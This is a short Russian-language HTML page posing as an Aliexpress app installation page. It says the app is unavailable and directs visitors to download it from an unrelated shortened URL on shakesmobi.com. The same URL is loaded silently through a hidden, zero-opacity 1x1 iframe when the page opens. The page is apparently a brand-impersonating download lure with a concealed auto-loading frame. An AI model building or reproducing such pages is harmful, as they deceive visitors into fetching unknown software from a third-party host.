<html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
         <meta name="robots" content="nofollow" />

        <title>Установка приложения</title>
        <style>
            body{
                margin:0;
                padding:0;
            }
            .top {
                background: #9b59b6;
                height: 45px;
                width: 100%;
                position: relative;
                font-family: sans-serif;              
            }
            .text {
                padding: 15px;
                text-align: center;
                color: #fff;                
            }
             .text2 {
                padding: 20px;
                text-align: center;
                color: #000;
                font-family: sans-serif;                
            }
            .frame {
                opacity: 0;
            }
        </style>
        <script src="https://use.fontawesome.com/63adbfa468.js"></script>
    </head>
    <body>
        <iframe src="http://shakesmobi.com/PT2S" height="1" width="1" class="frame"></iframe>
        <div class="top"><div class="text"><b>Приложение временно недоступно</b></div></div>
        <div class="text2">Вы можете скачать приложение Aliexpress</div>
        <img src="install2.png" width="100%">
        <div class="text2" style="font-size:27px;">Для установки приложения нажмите на <i class="fa fa-ellipsis-v" aria-hidden="true"></i> в правом верхнем углу</div>
        <div class="text2">Если вы открыли эту страницу в браузере, то приложение Aliexpress можно скачать по <a href="http://shakesmobi.com/PT2S" style="border-bottom: 1px dashed; text-decoration:none;" rel="nofollow">этой ссылке</a></div>
    </body>
</html>